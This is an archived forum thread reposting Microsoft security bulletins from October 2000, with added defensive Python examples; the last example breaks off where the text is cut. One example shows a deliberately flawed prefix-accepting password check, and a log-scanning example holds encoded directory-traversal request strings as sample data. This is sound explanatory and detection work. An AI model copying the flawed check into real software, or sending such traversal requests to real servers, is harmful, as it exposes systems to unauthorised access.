Continued from MS Security Bulletins - Vol. 9 (http://sysopt.earthweb.com/forum/Forum1/HTML/007513.html)
=============================================
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-072)
- --------------------------------------
Patch Available for "Share Level Password" Vulnerability
Originally posted: October 10, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows 95, 98, 98SE, and Windows Me.
The vulnerability could allow a malicious user to programmatically
access a Windows 9x/ME file share without knowing the entire password
assigned to that share.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-072.asp
Issue
=====
Microsoft Windows 9x/Me provides a password protection feature
referred to as "share level access" for the File and Print Sharing
service. However, due to the way the password feature is currently
implemented, a file share could be compromised, by a malicious user
who used a special client utility, without that user knowing the
entire password required to access that share.
Only share level access permissions are vulnerable. If a Windows 9x
or Windows Me machine were part of a Windows NT domain, user-level
access controls could be enforced on file shares and passwords would
not be needed to allow access to those shares. Windows NT and Windows
2000 machines can only be set up with user-level file share access
controls and are not susceptible to this vulnerability.
Affected Software Versions
==========================
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Me
Patch Availability
==================
Microsoft Windows 95
Patch available shortly
Microsoft Windows 98 and 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
Note: Additional security patches are available at the Microsoft Download Center.
More Information
================
Please see the following references for more information related to
this issue.
Frequently Asked Questions: Microsoft Security Bulletin MS00-072, http://www.microsoft.com/technet/security/bulletin/fq00-072.asp
Microsoft Knowledge Base article Q273991 discusses this issue and
will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Nsfocus Security Team http://www.nsfocus.com for
reporting this issue to us and working with us to protect customers.
Revisions
=========
- October 10, 2000: Bulletin Created.
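The bulletin above says a share could be opened without the client "knowing the entire password" but does not describe the server-side check. The following is an added example, not Microsoft's code and not taken from the bulletin: it contrasts a password check whose comparison length is taken from the client's input (my assumption about the class of defect, labelled as such in the code) with a check that derives a fixed-length digest from both sides and compares in constant time. The share password is a constructed sample.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Tuple

# Constructed sample password for a share; kept in cleartext here only so the
# two verifiers below can be compared on the same inputs.
SHARE_PASSWORD = "s3cretpw"


def verify_prefix_accepting(stored: str, supplied: str) -> bool:
    """The class of defect the bulletin describes: the number of characters
    compared is taken from the client's input rather than from the stored
    password, so any non-empty prefix of the real password is accepted.
    Assumption: this models the effect stated in the bulletin, not the exact
    Windows 9x code path, which the bulletin does not describe."""
    if not supplied:
        return False
    return stored[: len(supplied)] == supplied


def make_verifier(stored: str, salt: bytes = None):
    """Return a verifier that derives a fixed-length digest from both sides
    and compares the digests in constant time. The digest length does not
    depend on the client's input, so a partial password cannot match."""
    salt = salt if salt is not None else os.urandom(16)
    expected = hashlib.pbkdf2_hmac("sha256", stored.encode("utf-8"), salt, 20_000)

    def verify(supplied: str) -> bool:
        candidate = hashlib.pbkdf2_hmac("sha256", supplied.encode("utf-8"), salt, 20_000)
        return hmac.compare_digest(candidate, expected)

    return verify


def compare_verifiers(stored: str, attempts: List[str]) -> Dict[str, Tuple[bool, bool]]:
    """For each attempt return (accepted by the prefix-accepting check,
    accepted by the full-length digest check)."""
    hardened = make_verifier(stored)
    return {a: (verify_prefix_accepting(stored, a), hardened(a)) for a in attempts}


if __name__ == "__main__":
    results = compare_verifiers(SHARE_PASSWORD, ["s", "s3cr", "s3cretpw", "wrong"])
    for attempt, (weak, strong) in results.items():
        print(f"{attempt!r:12} prefix-accepting={weak!s:5} full-length={strong}")
```

The point for a defender is that the comparison must be driven by the stored secret, never by the length of what the client sent; hashing both sides to a fixed-size digest makes that property hard to get wrong.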
socalgal
10-11-2000, 05:59 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-073)
- --------------------------------------
Patch Available for "Malformed IPX NMPI Packet" Vulnerability
Originally posted: October 11, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows 95, Windows 98, 98 Second
Edition and Windows Me. The vulnerability could be used to cause an
affected system to fail, and depending on the number of affected
machines on a network, potentially could be used to flood the network
with superfluous data. The affected system component normally is
present only if it has been deliberately installed.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-073.asp
Issue
=====
The Microsoft IPX/SPX protocol implementation (NWLink) includes an
NMPI (Name Management Protocol on IPX) listener that will reply to
any requesting network address. The NMPI listener software does not
filter the requesting computer's network address correctly, and will
therefore reply to a network broadcast address. Such a reply would in
turn cause other IPX NMPI listener programs to also reply. This
sequence of broadcast replies could generate a large amount of
unnecessary network traffic. A machine that crashed due to this
vulnerability could be put back into service by rebooting.
IPX is not installed by default in Windows 98, 98 Second Edition, or
Windows Me, and is only installed by default in Windows 95 if there
is a network card present in the machine at installation time. Even
when IPX is installed, a malicious user's ability to exploit this
vulnerability would depend on whether he could deliver a malformed
NMPI packet to an affected machine. Routers frequently are configured
to drop IPX packets, and if such a router lay between the malicious
user and an affected machine, he could not attack it. Routers on the
Internet, as a rule, do not forward IPX packets, and this would tend
to protect intranets from outside attack, as well as protecting
machines connected to the Internet via dial-up connections. As
discussed in the FAQ, the most likely scenario in which this
vulnerability could be exploited would be one in which a malicious
user on an intranet would attack affected machines on the same
intranet, or one in which a malicious user on the Internet attacked
affected machines on his cable modem or DSL subnet.
Affected Software Versions
==========================
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition
- Microsoft Windows Me
Patch Availability
==================
- Microsoft Windows 95
http://download.microsoft.com/download/win95/Update/11974/W95/EN-US/273727USA5.EXE
- Microsoft Windows 98 and 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11974/W98/EN-US/273727USA8.EXE
- Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11974/WinMe/EN-US/273727USAM.EXE
Note: The above links have been broken for better readability.
Note: Additional security patches are available at the Microsoft Download Center.
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-073,
http://www.microsoft.com/technet/security/bulletin/fq00-073.asp
- Microsoft Knowledge Base article Q273727 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions
=========
- October 11, 2000: Bulletin Created.
socalgal
10-11-2000, 08:25 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-074)
- --------------------------------------
Patch Available for "WebTV for Windows Denial of Service"
Vulnerability
Originally posted: October 11, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) WebTV for Windows. The vulnerability
could allow a malicious user to remotely crash systems running WebTV
for Windows.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-074.asp
Issue
=====
There is a denial of service vulnerability in WebTV for Windows that
may allow a malicious user to remotely crash either the WebTV for
Windows application and/or the computer system running WebTV for
Windows. Restarting the application and/or system will return the
system to its normal state.
Although the WebTV for Windows application ships with Windows 98,
98SE and Windows Me products, the application is not installed by
default, and customers who have not installed it would not be at
risk.
Affected Software Versions
==========================
- Microsoft WebTV for Windows on Windows 98, Windows 98SE, and
Windows Me
NOTE: This vulnerability is not related to the WebTV(tm) service
provided by WebTV Networks.
Patch Availability
==================
- Windows 98 and 98SE http://download.microsoft.com/download/win98SE/Update/12278/W98/EN-US/274113USA8.EXE
- Windows Me http://download.microsoft.com/download/winme/Update/12278/WinMe/EN-US/274113USAM.EXE
NOTE: The above URLs may have been wrapped.
NOTE: Additional security patches are available at the Microsoft Download Center.
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-074,
http://www.microsoft.com/technet/security/bulletin/fq00-074.asp
- Microsoft Knowledge Base article Q274113 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions
=========
- October 11, 2000: Bulletin Created.
socalgal
10-12-2000, 04:48 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-075)
- --------------------------------------
Patch Available for "Microsoft VM ActiveX Component" Vulnerability
Originally posted: October 12, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) virtual machine (Microsoft VM). If a
malicious web site operator were able to coax a user into visiting
his site, the vulnerability could allow him to take any desired
action on a visiting user's machine.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-075.asp
Issue
=====
The Microsoft VM is a virtual machine for the Win32(r) operating
environment. It runs atop Microsoft(r) Windows 95, 98, Windows Me,
Windows NT 4.0, or Windows 2000. It ships as part of each operating
system, and also as part of Microsoft Internet Explorer. The version
of the Microsoft VM that ships with Microsoft Internet Explorer 4.x
and Internet Explorer 5.x contains a security vulnerability that
could allow a Java applet, on a malicious web site to take any
desired action on a visiting user's machine.
The Microsoft virtual machine (Microsoft VM) contains functionality
that allows ActiveX controls to be created and manipulated by Java
applications or applets. This functionality is intended to only be
available to stand-alone Java applications or digitally signed
applets. However, this vulnerability allows ActiveX controls to be
created and used from a web page, or from within an HTML-based e-mail
message, without requiring a signed applet. If a user visited a
malicious web site that exploited this vulnerability, a Java applet
on one of the web pages could run any desired ActiveX control, even
ones that are marked as unsafe for scripting. This would enable the
malicious web site operator to take any desired action on the user's
machine.
Web sites placed within the Restricted Sites zone in Internet
Explorer will not be able to exploit this vulnerability.
Affected Software Versions
==========================
Versions of the Microsoft VM are identified by build numbers, which
can be determined using the JVIEW tool, as discussed in the FAQ. The
following builds of the Microsoft VM are affected:
- All builds in the 2000 series.
- All builds in the 3100 series.
- All builds in the 3200 series.
- All builds in the 3300 series.
Patch Availability
==================
- 2000-series Microsoft VM customers will be provided with an update
soon.
- 3100-series Microsoft VM customers upgrade to build 3318 or later
from:
http://www.microsoft.com/java/vm/dl_vm40.htm
- 3200-series Microsoft VM customers upgrade to build 3318 or later
from:
http://www.microsoft.com/java/vm/dl_vm40.htm
- 3300-series Microsoft VM customers upgrade to build 3318 or later
from:
http://www.microsoft.com/java/vm/dl_vm40.htm
This fix supersedes the patch supplied in MS00-059
Note: Additional security patches are available at the Microsoft Download Center.
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-075,
http://www.microsoft.com/technet/security/bulletin/fq00-075.asp
- Microsoft Knowledge Base (KB) article Q275609,
http://www.microsoft.com/technet/support/kb.asp?ID=275609
discusses this issue in more detail.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions
=========
- October 12, 2000: Bulletin Created.
socalgal
10-13-2000, 06:22 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-076)
- --------------------------------------
Patch Available for "Cached Web Credentials" Vulnerability
Originally posted: October 12, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Internet Explorer. Under a daunting
set of conditions, the vulnerability could enable a malicious user to
obtain another user's userid and password to a web site.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-076.asp
Issue
=====
When a user authenticates to a secured web page via Basic
Authentication, IE caches the userid and password that were used, in
order to minimize the number of times the user must authenticate to
the same site. By design, IE should only send the cached credentials
to secured pages on the site. However, it will actually send them to
non-secure pages on the site as well. If a malicious user had
complete control of another user's network communications, he could
wait until another user logged onto a secured site, then spoof a
request for a non-secured page in order to collect the credentials.
The vulnerability does not provide a means by which the malicious
user could force the other user to log onto a secure page of his
choice, and could only be used to reveal credentials that had been
cached during the current IE session.
Affected Software Versions
==========================
- Microsoft Internet Explorer 4.x
- Microsoft Internet Explorer 5.x prior to version 5.5
Note: Internet Explorer 5.5 is not affected by this vulnerability.
Customers using IE 5.5 do not need to take any action.
Note: The patch requires IE 5.01 SP1 to install. Customers who
install this patch on other versions may receive a message reading
"This update does not need to be installed on this system". This
message is incorrect. More information is available in KB article
Q273868.
Note: As discussed in Affected Software Versions, this vulnerability
does not affect IE 5.5.
Note: Per the normal security support policy for IE, security patches
for Internet Explorer version 4.x are no longer being produced.
Microsoft recommends that IE 4.x customers who are concerned about
this issue consider upgrading to either IE 5.01 SP1 or IE 5.5.
Note: The fix for this issue will be included in IE 5.01 SP2.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-076,
http://www.microsoft.com/technet/security/bulletin/fq00-076.asp
- Microsoft Knowledge Base article Q273868 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks ACROS Security http://www.acros.si for reporting
this issue to us and working with us to protect customers.
Revisions
=========
- October 12, 2000: Bulletin Created.
socalgal
10-13-2000, 06:32 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-077)
- --------------------------------------
Patch Available for "NetMeeting Desktop Sharing" Vulnerability
Originally posted: October 13, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in NetMeeting, an application that ships with
Microsoft(r) Windows 2000 and is also available as a separate
download for Windows NT 4.0. The vulnerability could allow a
malicious user to temporarily prevent an affected machine from
providing any NetMeeting services and possibly consume 100% CPU
utilization during an attack.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-077.asp
Issue
=====
A remote denial of service vulnerability has been discovered in a
component of NetMeeting. The denial of service can occur when a
malicious client sends a particular malformed string to a port which
the NetMeeting service is listening on and with Remote Desktop
Sharing enabled.
Although the NetMeeting application is provided as part of Windows
2000 products, the application and affected component are not enabled
by default, and customers who have not enabled it would not be at
risk from this vulnerability.
Affected Software Versions
==========================
NetMeeting Version 3.01 (4.4.3385) on Windows 2000 or Windows NT 4.0.
Patch Availability
==================
- Windows 2000 and Windows NT 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25029
Note: Additional security patches are available at the Microsoft Download Center.
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-077,
http://www.microsoft.com/technet/security/bulletin/fq00-077.asp
- Microsoft Knowledge Base article Q273854 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Kirk Corey of Diversified Software Industries, Inc.
(http://www.dsi-inc.net) for reporting this issue to us and working with us
to protect customers.
Revisions
=========
- October 13, 2000: Bulletin Created.
socalgal
10-17-2000, 08:03 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-078)
- --------------------------------------
Patch Available for "Web Server Folder Traversal" Vulnerability
Originally posted: October 17, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) IIS 4.0 and 5.0. The vulnerability
could potentially allow a visitor to a web site to take a wide range
of destructive actions against it, including running programs on it.
This vulnerability is eliminated by the patch that accompanied
Microsoft Security Bulletin MS00-057. Customers who have applied
that patch are already protected against the vulnerability and do not
need to take additional action. Microsoft strongly urges all
customers using IIS 4.0 and 5.0 who have not already done so to apply
the patch immediately.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-078.asp
Issue
=====
Due to a canonicalization error in IIS 4.0 and 5.0, a particular type
of malformed URL could be used to access files and folders that lie
anywhere on the logical drive that contains the web folders. This
would potentially enable a malicious user who visited the web site
to gain additional privileges on the machine - specifically, it could
be used to gain privileges commensurate with those of a locally
logged-on user. Gaining these permissions would enable the malicious
user to add, change or delete data, run code already on the server,
or upload new code to the server and run it.
The request would be processed under the security context of the
IUSR_machinename account, which is the anonymous user account for
IIS. Within the web folders, this account has only privileges that
are appropriate for untrusted users. However, it is a member of the
Everyone and Users groups and, as a result, the ability of the
malicious user to access files outside the web folders becomes
particularly significant. By default, these groups have execute
permissions to most operating system commands, and this would give
the malicious user the ability to cause widespread damage. Customers
who have proactively removed the Everyone and Users groups from
permissions on the server, or who are hosting the web folders on a
different drive from the operating system, would be at significantly
less risk from the vulnerability.
Microsoft strongly recommends that all customers running IIS 4.0 or
5.0 immediately apply the patch for this vulnerability. This patch
was originally released in August 2000 as a fix for a completely
different vulnerability (discussed in Microsoft Security Bulletin
MS00-057), and customers who have already applied it do not need to
take any additional action.
Affected Software Versions
==========================
- Microsoft IIS 4.0
- Microsoft IIS 5.0
Patch Availability
==================
- Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862
- Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862
Note: The IIS 4.0 patch can be installed on systems running Windows
NT(r) 4.0 Service Packs 5 and 6a. It will be included in Windows NT
4.0 Service Pack 7. The IIS 5.0 patch can be installed on systems
running either Windows(r) 2000 Gold or Service Pack 1. It will be
included in Windows 2000 Service Pack 2.
Note: The Download Center pages discussed above may, for the next
several days, only reference the "File Permissions Canonicalization"
vulnerability. However, we are updating the pages to state that it
applies to both that vulnerability and this one.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-078,
http://www.microsoft.com/technet/security/bulletin/fq00-078.asp
- Microsoft Security Bulletin MS00-057, Microsoft Security Bulletin
http://www.microsoft.com/technet/security/bulletin/ms00-057.asp
- Microsoft Knowledge Base article Q276489 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Rain Forest Puppy for reporting this issue to us and
working with us to protect customers.
Revisions
=========
- October 17, 2000: Bulletin Created.
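The bulletin above attributes the problem to a canonicalization error: the server decides whether a request stays inside the web folders before the request path has been fully decoded and resolved. The following is an added example, not Microsoft's code and not a description of the specific malformed URL the patch addresses (which the bulletin does not give). It shows the ordering mistake in its generic form, a check run on the raw request, beside a check that percent-decodes, normalizes separators and resolves dot segments first, and runs both over constructed log lines in a simplified layout that is not real IIS output.

```python
from urllib.parse import unquote


def naive_is_inside_root(request_uri: str) -> bool:
    """The ordering mistake behind canonicalization bugs: the check runs on
    the raw, still-encoded request, so an encoded '..' or a backslash
    separator is not recognised even though the file system honours it
    after decoding."""
    return ".." not in request_uri


def canonical_segments(request_uri: str):
    """Decode the request, then resolve it into path segments below the web
    root. Returns None if the resolved path climbs above the root."""
    path = request_uri.split("?", 1)[0]   # the query string is not part of the path
    path = unquote(path)                  # percent-decode BEFORE any authorization check
    path = path.replace("\\", "/")        # Windows accepts both separators
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                return None               # escaped the web root
            segments.pop()
        else:
            segments.append(seg)
    return segments


def canonical_is_inside_root(request_uri: str) -> bool:
    return canonical_segments(request_uri) is not None


# Constructed sample log lines: "date time c-ip cs-method cs-uri sc-status".
SAMPLE_LOG = """\
2000-10-17 10:00:01 10.0.0.5 GET /default.asp 200
2000-10-17 10:00:02 10.0.0.5 GET /images/../default.asp 200
2000-10-17 10:00:03 10.0.0.9 GET /images/%2e%2e/%2e%2e/private.txt 200
2000-10-17 10:00:04 10.0.0.9 GET /docs/..%5c..%5cprivate.txt 200
2000-10-17 10:00:05 10.0.0.7 GET /docs/report.asp?id=..%2f.. 200
"""


def flag_traversal(log_text: str):
    """Return (client, uri) pairs whose URI resolves outside the web root after
    canonicalization, and the subset the naive raw-string check would pass."""
    flagged, missed_by_naive = [], []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _date, _time, client, _method, uri, _status = line.split()
        if not canonical_is_inside_root(uri):
            flagged.append((client, uri))
            if naive_is_inside_root(uri):
                missed_by_naive.append(uri)
    return flagged, missed_by_naive


if __name__ == "__main__":
    flagged, missed = flag_traversal(SAMPLE_LOG)
    for client, uri in flagged:
        print(f"{client:10} escapes web root: {uri}")
    print("missed by the raw-string check:", missed)
```

Two of the bulletin's mitigations map directly onto this model: hosting the web folders on a drive other than the operating system's limits what a resolved path can reach, and removing the Everyone and Users groups from permissions limits what the IUSR_machinename account can do with a file it does reach.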
socalgal
10-18-2000, 08:01 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-079)
- --------------------------------------
Patch Available for "HyperTerminal Buffer Overflow" Vulnerability
Originally posted: October 18, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in the HyperTerminal application that ships with
several Microsoft(r) operating systems. This vulnerability could,
under certain circumstances, allow a malicious user to execute
arbitrary code on another user's system.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-079.asp
Issue
=====
The HyperTerminal application is a utility that installs, by default,
on all versions of Windows 98, 98SE, Windows ME, Windows NT, and
Windows 2000. The product contains an unchecked buffer in a section
of the code that processes Telnet URLs. If a user opened an HTML mail
that contained a particularly malformed Telnet URL, it would result
in a buffer overrun that could enable the creator of the mail to
cause arbitrary code to run on the user's system. Please note that,
although a Telnet URL is involved in this vulnerability, there is no
relationship between this vulnerability and the "Windows 2000 Telnet
Client NTLM Authentication" vulnerability discussed in MS00-067.
HyperTerminal is the default Telnet client on Windows 98, 98SE and
ME. However, it is not the default Telnet client on Windows 2000, and
Windows 2000 users who have not taken steps to make it the default
Telnet client would not be affected by the vulnerability.
Although HyperTerminal ships as part of several Microsoft products,
it was developed by a third party - Hilgraeve, Inc. Additional
information on the vulnerability and a patch for their full version
product, HyperTerminal Private Edition, is available from their web
site at http://www.hilgraeve.com
Affected Software Versions
==========================
- Microsoft Windows 98 and Windows 98SE
- Microsoft Windows Me
- Microsoft Windows 2000
Patch Availability
==================
- Windows 98 and 98SE:
http://download.microsoft.com/download/win98/Update/12395/W98/EN-US/274548USA8.EXE
- Windows Me:
http://download.microsoft.com/download/winme/Update/12395/WinMe/EN-US/274548USAM.EXE
- Windows 2000 (can be applied to both Gold and Service Pack 1):
http://www.microsoft.com/downloads/release.asp?releaseid=25112
Note: The above URLs may have been wrapped for readability.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-079,
http://www.microsoft.com/technet/security/bulletin/fq00-079.asp
- Microsoft Knowledge Base articles Q274548 (Win9x) and Q276471
(Win2K) discuss this issue and will be available soon.
- A patch for HyperTerminal Private Edition (a for-purchase upgrade
from the default client) is available from
http://www.hilgraeve.com
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Luciano Martins of USSR Labs (http://www.ussrback.com) for
reporting this issue to us and working with us to protect customers.
Revisions
=========
- October 18, 2000: Bulletin Created.
socalgal
10-23-2000, 09:29 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-080)
- --------------------------------------
Patch Available for "Session ID Cookie Marking" Vulnerability
Originally posted: October 23, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Internet Information Server. The
vulnerability could allow a malicious user to "hijack" another user's
secure web session, under a very restricted set of circumstances.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-080.asp
Issue
=====
IIS supports the use of a Session ID cookie to track the current
session identifier for a web session. However, .ASP in IIS does not
support the creation of secure Session ID cookies as defined in RFC
2109. As a result, secure and non-secure pages on the same web site
use the same Session ID. If a user initiated a session with a secure
web page, a Session ID cookie would be generated and sent to the
user, protected by SSL. But if the user subsequently visited a
non-secure page on the same site, the same Session ID cookie would
be exchanged, this time in plaintext. If a malicious user had
complete control over the communications channel, he could read the
plaintext Session ID cookie and use it to connect to the user's
session with the secure page. At that point, he could take any
action on the secure page that the user could take.
The conditions under which this vulnerability could be exploited are
rather daunting. The malicious user would need to have complete
control over the other user's communications with the web site. Even
then, the malicious user could not make the initial connection to
the secure page - only the legitimate user could do that. The patch
eliminates the vulnerability by adding support for secure Session ID
cookies in .ASP pages. (Secure cookies already are supported for all
other types of cookies, under all other technologies in IIS).
Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0
- Microsoft Internet Information Services 5.0
Note: The patch installs support for secure Session ID cookies, but
does not enable it for reasons of application compatibility. As
discussed in the Knowledge Base article, it can be enabled or
disabled on a site-by-site basis.
Note:
- The IIS 4.0 version of this patch can be installed on Windows
NT(r) 4.0 systems running Service Pack 6a, and will be included in
Service Pack 7.
- The IIS 5.0 version of this patch can be installed on
Windows(r) 2000 systems with or without Service Pack 1, and will
be included in Service Pack 2.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-080,
http://www.microsoft.com/technet/security/bulletin/fq00-080.asp
- Microsoft Knowledge Base article Q274149 discusses this issue
and will be available soon.
- RFC 2109, HTTP State Management,
http://www.ietf.org/rfc/rfc2109.txt.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks ACROS Security (http://www.acros.si/) and Ron Sires
and C. Conrad Cady of Healinx http://www.healinx.com/ for
reporting this issue to us and working with us to protect customers.
Revisions
=========
- October 23, 2000: Bulletin Created.
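The MS00-080 scenario above turns on one cookie attribute. The following Python is an added example (not code from the bulletin or from Microsoft) that parses a Set-Cookie header, reports session cookies that lack the Secure attribute, and replays the bulletin's sequence: the cookie is issued on an https page, then an http page on the same site is visited. The header values, the ASPSESSIONID name prefix check and the hostname are constructed for the example.

```python
"""Does a session cookie carry the Secure attribute, and would it leak over plaintext?"""
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

# Constructed Set-Cookie headers for the example. ASPSESSIONID* is the name prefix ASP
# uses for its session cookie; the suffix and the value here are made up.
UNPATCHED_SET_COOKIE = "ASPSESSIONIDQQGGQZLR=ABCDEFGHIJKLMNOPQRSTUVWX; path=/"
HARDENED_SET_COOKIE = "ASPSESSIONIDQQGGQZLR=ABCDEFGHIJKLMNOPQRSTUVWX; path=/; secure"

# Assumption for the example: cookies whose name starts with one of these are session ids.
SESSION_NAME_PREFIXES = ("ASPSESSIONID",)


def parse_set_cookie(header):
    """Parse one Set-Cookie header into {name: {"value", "secure", "path"}}."""
    jar = SimpleCookie()
    jar.load(header)
    return {
        name: {
            "value": morsel.value,
            "secure": bool(morsel["secure"]),  # '' when absent, True when present
            "path": morsel["path"] or "/",
        }
        for name, morsel in jar.items()
    }


def insecure_session_cookies(header):
    """Names of session cookies in the header that lack the Secure attribute."""
    cookies = parse_set_cookie(header)
    return sorted(
        name for name, c in cookies.items()
        if name.upper().startswith(SESSION_NAME_PREFIXES) and not c["secure"]
    )


def cookies_sent_to(cookies, url):
    """Client rule from RFC 2109: a Secure cookie is only sent over a secure channel."""
    scheme = urlsplit(url).scheme
    return {n: c["value"] for n, c in cookies.items() if scheme == "https" or not c["secure"]}


def leaks_session_id_in_clear(header, site="www.example.test"):
    """Replay the bulletin's scenario: the cookie is issued on an https page, then an
    http page on the same site is visited. True if a session id goes out in plaintext."""
    cookies = parse_set_cookie(header)
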